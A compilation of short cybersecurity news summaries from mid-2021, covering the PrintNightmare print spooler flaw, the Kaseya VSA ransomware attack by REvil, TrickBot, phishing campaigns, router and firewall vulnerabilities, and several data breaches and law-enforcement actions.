    Microsoft released a security update to fix the vulnerability, but researchers determined that the patch could be bypassed under certain conditions. Since the incomplete fix, security researchers have been heavily scrutinizing the Windows printing APIs and have found further vulnerabilities affecting the Windows print spooler. Researchers discovered that executing a malicious dynamic link library via the 'Queue-Specific Files' feature of the Windows Point and Print capability could enable an attacker to move laterally through a network. When the DLL executes on a target machine, it runs with SYSTEM privileges and could be used to run any command on the target computer.

    D-Link Issues Hotfix for Hard-Coded Password Router Vulnerabilities

    D-Link manufactures networking equipment that can be used in home or enterprise environments. The equipment can be purchased in stores as well as online and is typically a cost-effective solution for consumers. Cisco security teams discovered vulnerabilities in the DIR-3040 model firmware, which contains hardcoded passwords, command injection vulnerabilities and information disclosure bugs.

    CISA Releases Mitigation and Hardening Guidance for MSPs and Small to Medium Size Businesses After K

    On Friday, July 2, we reported that attackers were actively exploiting a zero-day vulnerability in Kaseya VSA software via a supply-chain attack, while the attacks were still ongoing. Primary targets were Managed Service Providers and Managed Security Service Providers; during the attack, few details were known, such as the initial attack vector (entry point) and how the attackers were accessing internal networks and ultimately encrypting systems.

    Trickbot Improves its VNC Module in Recent Attacks

    Earlier this year the TrickBot botnet was dismantled by global law enforcement; after a brief hiatus, it has reemerged in recent attacks. “The authors recently implemented an update for the VNC module used for remote control over infected systems” (Security Affairs, 2021). Despite actions from law enforcement, the botnet continues to see revisions.

    Emergency Directive 21-04: Mitigate Windows Print Spooler Service Vulnerability

    In the directive, CISA states that it has "become aware of active exploitation, by multiple threat actors, of a vulnerability (CVE-2021-34527) in the Microsoft Windows Print Spooler service. The exploitation of the vulnerability allows an attacker to remotely execute code with system-level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization" (CISA, 2021).

    Threat Actors Scrape 600 Million LinkedIn Profiles and are Selling the Data Online – Again

    For the third time this year, threat actors have scraped data from LinkedIn. The archive contains data from hundreds of millions of LinkedIn profiles. It is currently being sold on a dark web forum. The actor involved in the attack “claims that the data is new and “better” than that collected during the previous scrapes. Samples from the archive shared by the author include full names, email addresses, links to the users’ social media accounts, and other data points that users had publicly listed on their LinkedIn profiles.”

    Operation SpoofedScholars: A Conversation with TA453

    A recent report from Proofpoint researchers suggests that TA453 is a state-sponsored actor operating on behalf of Iran, supporting the Islamic Revolutionary Guard Corps (IRGC) in its collection of information. The actors illegally obtained access to a website belonging to a world-class academic institution and leveraged the compromised infrastructure to harvest the credentials of their intended targets. Initial communications were established through an email message appearing to be from a “Dr. Hanns Bjoern Kendel, Senior Teaching and Research Fellow at SOAS University in London” (Proofpoint, 2021). The email address was registered on Gmail as hannse.kendel4@gmail[.]com and was used to engage in conversation with intended targets.

    SolarWinds Issues Hotfix for Zero-Day Flaw Under Active Attack

    Yesterday, we reported that Microsoft had discovered vulnerabilities in SolarWinds Serv-U software. To recap, the vulnerabilities exist in the Serv-U Managed File Transfer and Serv-U Secured FTP platforms. Impacted versions included the latest release on May 5, version 15.2.3 HF1, and all previous versions of the software. A proof-of-concept exploit provided by Microsoft directly to the company demonstrated how an attacker could “install programs; view, change or delete data; or run programs on the affected systems” (Microsoft, 2021) via remote code execution where SSH is enabled on Serv-U products.

    Hackers accessed Mint Mobile subscribers' data and ported some numbers

    MVNO stands for Mobile Virtual Network Operator. MVNOs do not own the infrastructure to facilitate communications; instead, they have contracts with larger carriers who grant the smaller companies access to resources for resale. Mint Mobile is an up-and-coming MVNO based in the United States that operates on T-Mobile's network. Because of its low-priced cellular plans, the company has been growing steadily in terms of subscribers.

    Kaseya Rolled out a Patch for VSA Supply-Chain Attack

    Following the attacks against numerous Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs) in which REvil ransomware affiliates encrypted company systems, Kaseya has released patches to address a series of vulnerabilities. Critical vulnerabilities included credential leaks and cross-site scripting vulnerabilities in the company's VSA software. At this time, it is unclear exactly which vulnerabilities the attackers leveraged, but it is suspected that they were chained together to bypass the software's authentication mechanisms.

    Flashpoint - Russian Attacks on Critical Infrastructure

    Attacks similar to those perpetrated in Ukraine have later been observed in other countries, notably Germany—suggesting that Russia learns from the attacks it conducts in Ukraine and conducts further attacks in more strategic countries. Examining Russian attacks in Ukraine can thus potentially provide hints to Russia’s thinking about future attack plans.

    Flashpoint: IcedID Attacks and Evolving Ransomware Trends

    Over the last several months Flashpoint analysts have observed an increase in activity by the “IcedID” trojan. The activity includes multiple campaigns that have been publicly observed, indicating an increase in proliferation of IcedID. The initial infection vector is commonly spear-phishing or malicious document macros. Once installed, the trojan drops other malware, leading to further access after the initial infection.

    Flashpoint - REvil Ransomware and Threat Actor Group

    REvil attempts to encrypt data and delete shadow copy backups to make data recovery more difficult. It then demands a ransom from victims to recover the data. REvil ransomware is usually installed directly by a threat actor who has either accessed an unprotected RDP port or exploited common vulnerabilities such as CVE-2019-2725 and CVE-2018-8453 to gain access to a network and escalate privileges.

    Flashpoint - REvil Attack on Kaseya VSA Tool

    The Russian ransomware extortionist threat group "REvil" conducted a supply-chain ransomware attack on July 2, 2021, that has affected “fewer than 60” managed service providers (MSPs) and “fewer than 1,500” downstream businesses in at least seventeen countries.

    Lazarus Gang Targets Engineers with Job Offers Using Poisoned Emails

    Security researchers from AT&T Alien Labs shared new intelligence surrounding Lazarus Group and its continued targeting of security experts. In its newest campaign the group is targeting engineers working in the defence industry. Using emails and social media platforms, the group has created fake job offers to target defence contractors in the United States and Europe. “Attached to the emails are Word documents containing macros that plant malicious code onto a victim’s computer, and make changes to the targeted computer’s settings in an attempt to avoid detection.”

    Hackers Use a New Technique in Malspam Attacks to Disable Macro Security Warnings in Weaponized Docs

    A popular form of phishing involves the use of Microsoft Office documents loaded with malicious macros. Using social engineering tricks and business email compromise, cybercriminals convince users to download a malicious file that requires macros to view. Upon the user enabling macros, the document communicates with the attacker’s server to download malware onto the machine.

    Experts Bypassed Microsoft’s Emergency Patch for the PrintNightmare - Microsoft PrintNightmare Security Updates Work

    Navigating the PrintNightmare vulnerabilities this week has been a challenge. An out-of-band patch released earlier this week was found to be incomplete, with various security experts sharing details of how to bypass the patch. Microsoft says the emergency security updates released at the start of the week correctly patch the PrintNightmare Print Spooler vulnerability for all supported Windows versions and urges users to start applying the updates as soon as possible. “Our investigation has shown that the OOB security update is working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare,” the Microsoft Security Response Center explains. “All reports we have investigated have relied on the changing of default registry setting related to Point and Print to an insecure configuration.”

    Kaseya Warns of Phishing Campaign Pushing Fake Security Updates

    We reported earlier this week that threat actors were using fake Kaseya update emails as a lure to trap victims. Kaseya today confirmed our reports and warned of an additional phishing campaign that attempts to breach networks by spamming malicious attachments and embedded links. The emails pretend to be legitimate security updates for Kaseya VSA.

    Insurance Giant CNA Reports Data Breach after Ransomware Attack

    The US-based insurance company CNA Financial Corporation began notifying customers of a data breach following attacks by Phoenix CryptoLocker ransomware that occurred back in March of this year. CNA is one of the largest commercial insurance firms in the US, assisting businesses in the US, Canada, Europe, and Asia. The company said a limited amount of data was copied before the threat actors deployed their ransomware.

    Critical Sage X3 RCE Bug Allows Full System Takeovers

    “Four vulnerabilities afflict the popular Sage X3 enterprise resource planning (ERP) platform, researchers found – including one critical bug that rates 10 out of 10 on the CVSS vulnerability-severity scale. Two of the bugs could be chained together to allow complete system takeovers, with potential supply-chain ramifications.”

    US: We May Take Unilateral Action Against Russian Cyber-Criminals

    The White House has issued another warning to Russia after cybercriminals continue to attack American organizations and critical infrastructure. REvil ransomware operators as well as other cybercriminals are reportedly residing in Russia, where the Putin administration has historically done nothing to curb cyber attacks coming from Russian soil.

    SonicWall Addresses Critical CVE-2021-20026 Flaw in NSM Devices

    Last May, SonicWall asked customers to immediately patch CVE-2021-20026, a post-authentication vulnerability in the vendor's Network Security Manager (NSM) product. The company released further details this week, highlighting a command injection vulnerability. The vulnerability received a CVSS score of 8.8 and could be exploited without any user interaction. An authenticated attacker could perform command injection by using specially crafted HTTP requests.

    Fake Kaseya VSA Security Update Backdoors Networks with Cobalt Strike

    Threat actors are pushing a fake Kaseya VSA security update in an attempt to capitalize on the current ransomware situation impacting the vendor. Cobalt Strike is the payload delivered in this active spam campaign. “Cobalt Strike is a legitimate penetration testing tool and threat emulation software that's also used by attackers for post-exploitation tasks and to deploy so-called beacons that allow them to gain remote access to compromised systems.”

    Microsoft Releases Out-of-Band Security Updates for PrintNightmare

    Microsoft has released out-of-band security updates to address a remote code execution (RCE) vulnerability—known as PrintNightmare (CVE-2021-34527)—in the Windows Print spooler service. According to the CERT Coordination Center (CERT/CC), “The Microsoft Windows Print Spooler service fails to restrict access to functionality that allows users to add printers and related drivers, which can allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system.”

    Operation Lyrebird: Group-IB Assists INTERPOL in Identifying Suspect Behind Numerous Cybercrimes

    Group-IB created Operation Lyrebird, which helps in the identification and apprehension of high-profile threat actors. This week Group-IB assisted INTERPOL in the arrest of Dr. HeX, a cybercriminal responsible for multiple attacks against French telecommunications companies, major banks and multinational corporations. Following a two-year investigation, Moroccan police arrested the alleged criminal based on data about his cybercrimes provided by Group-IB.

    REvil Ransomware Gang Hit Spanish Telecom Giant MasMovil

    REvil ransomware operators attacked MasMovil, one of the largest Spanish telecommunication providers, last week. In addition to encrypting the company's networks, the group claims to have also stolen sensitive data from it. The group has posted screenshots of the allegedly stolen documents, including a list of folders, to its leak site.

    1,500 businesses Hit by REvil Ransomware in Kaseya Attack

    In a statement released by Kaseya yesterday, the vendor shared further details of the recent cyberattacks against customers using Kaseya VSA on-premise products. According to Kaseya, the ransomware was able to breach the systems of roughly 60 of its direct customers, and at least 1,500 downstream victims were impacted through Kaseya remote management tools.

    Kaseya says the attack has a “limited impact” with only 50 of their more than 35,000 customers being breached, and of their small business customers 800-1,500 of their approximately 800,000-1,000,000 have been compromised.

    Chronicles of the Babuk Malware

    In contrast with previously observed ransomware threat actors, Babuk’s operators advertise in English on more visible hacking forums. This new ransomware also lacks "kill-switches", a feature commonly built into top-tier ransomware that stops execution when a language of the Commonwealth of Independent States (CIS) is detected as the system default.

    Microsoft Warns of Critical PowerShell 7 Code Execution Vulnerability

    "Microsoft warns of a critical .NET Core remote code execution vulnerability in PowerShell 7 caused by how text encoding is performed in .NET 5 and .NET Core. PowerShell provides a command-line shell, a framework, and a scripting language focused on automation for processing PowerShell cmdlets. It runs on all major platforms, including Windows, Linux, and macOS, and it allows working with structured data such as JSON, CSV, and XML, as well as REST APIs and object models".

    Spanish Telecom Giant MasMovil Hit by REvil Ransomware Gang

    Spain's 4th largest telecom operator, MasMovil Ibercom or MasMovil, is the latest victim of the infamous REvil ransomware gang (aka Sodinokibi). "The telecom operator is big in Spain. The Group's fixed network reaches 18 million households with ADSL and close to 26 million with optical fiber. Its 4G mobile network covers 98,5% of the Spanish population."

    U.S. Insurance Giant AJG Reports Data Breach After Ransomware Attack

    The company experienced a ransomware attack on or around September 26, 2020, impacting its business operations. The company reported that they immediately took their systems offline to prevent further intrusion and initiated response protocols, notified law enforcement, launched an investigation with the assistance of third-party cybersecurity and forensic specialists, and implemented its business continuity plans to minimize disruption to its customers.

    Google Chrome Will Get an HTTPS-Only Mode for Secure Browsing

    Google is working on adding an HTTPS-Only Mode to the Chrome web browser to protect users' web traffic from eavesdropping by upgrading all connections to HTTPS. This new feature is now being tested in the Chrome 93 Canary preview releases for Mac, Windows, Linux, Chrome OS, and Android. While no official announcement has been made yet, HTTPS-Only Mode will likely start rolling out on August 31, when Chrome 93 is expected to reach stable status. Google has previously updated Chrome to default to HTTPS for all URLs typed in the address bar if the user specifies no protocol.

    DoubleVPN Servers, Logs, and Account Info Seized by Law Enforcement

    An international law enforcement operation has seized the servers, data, and customer logs of DoubleVPN, a double-encryption service commonly used by threat actors to evade detection while performing malicious activities. "DoubleVPN was heavily advertised on both Russian and English-speaking underground cybercrime forums as a means to mask the location and identities of ransomware operators and phishing fraudsters" (Europol, 2021).

    Hades Ransomware Gang Claims More Victims

    According to a report released by Accenture Security on Tuesday, it appears that Hades Ransomware group has taken further steps in an apparent bid to confuse investigators who have tried to work out who exactly the operators are.

    Linux Version of REvil Ransomware Targets ESXi VM

    We reported a few weeks ago that a new strain of the REvil ransomware was modified to infect not only Windows-based systems but also Linux. VMware's ESXi hosts have been actively targeted in attacks: "The REvil ransomware operators are now using a Linux encryptor to encrypt VMWare ESXi virtual machines which enterprises widely adopt,

    Details of over 200,000 students leaked in cyberattack

    Attacks against the education sector and students are steadily increasing. A few weeks ago we reported that the University of Iowa was hit with ransomware, and as a result students were unable to complete their assignments. This week a pro-Palestinian Malaysian hacker group known as "DragonForce" claimed that it hacked into AcadeME last week, resulting in a substantial data leak. The details of approximately 280,00 students were compromised, including emails, passwords, first/last names, addresses, and phone numbers of students who were registered on AcadeME.

    A Cisco ASA Vulnerability Is Actively Exploited

    The Cisco ASA vulnerability that we reported on last week is being targeted and successfully leveraged by hackers in attacks. The vulnerability is tracked as CVE-2020-3580 and was patched and disclosed by Cisco. However, it seems that the initial patch was incomplete, with a further fix being released in April 2021.

    Spear Phishing Campaign with New Techniques Aimed at Aviation Companies

    Fortinet Labs reports that phishing emails are specifically targeting the aviation industry, delivering a remote access trojan: “The infection cycle begins with phishing emails sent to aviation companies that contain malicious links disguised as pdf attachments. The link in the email directs the user to VB Script hosting sites, from which the initial payload (.vbs) is delivered. The .vbs script then drops the second stage payload, an xml file containing inline C# .NET assembly code that acts as a RAT loader. The loader hollows and injects the final payload, AsyncRAT, into the victim process (RegSvcs.exe). AsyncRAT, also known as RevengeRAT, connects to its C2 server, takes control of the compromised machine, and introduces additional payloads.”

    Microsoft signed a malicious Netfilter rootkit

    According to experts, attackers used a malicious driver that was certified by Microsoft to deliver the Netfilter rootkit malware. Rootkits are particularly dangerous pieces of malware because they are able to remain hidden on infected machines; they typically contain various tools capable of stealing passwords and banking information, disabling security controls, and logging keystrokes.